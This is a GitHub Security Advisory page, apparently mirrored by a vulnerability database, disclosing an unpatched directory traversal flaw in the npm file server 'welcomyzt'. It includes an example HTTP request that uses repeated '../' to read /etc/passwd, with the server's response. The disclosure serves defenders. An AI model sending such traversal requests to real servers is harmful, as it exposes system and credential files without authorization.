Loading HuntDB...

GHSA-8fv7-vm2p-5495

GitHub Security Advisory

Directory Traversal in welcomyzt

✓ GitHub Reviewed HIGH Has CVE

Advisory Details

`welcomyzt` is a simple file server.

`welcomyzt` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing `../` in the url.

**Example request:**
```http
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host: localhost
```
and server Response:
```http
HTTP/1.1 200 OK
Date: Thu, 04 May 2017 23:59:18 GMT
Connection: keep-alive
Transfer-Encoding: chunked

{contents of /etc/passwd}
```

## Recommendation

No patch is available for this vulnerability.

It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.

Affected Packages

npm welcomyzt
Affected versions: 0.0.0

Related CVEs

Key Information

GHSA ID
GHSA-8fv7-vm2p-5495
Published
September 1, 2020 5:23 PM
Last Modified
September 11, 2023 4:37 PM
CVSS Score
7.5 /10
Primary Ecosystem
npm
Primary Package
welcomyzt
GitHub Reviewed
✓ Yes

Dataset

Last updated: July 4, 2025 6:27 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.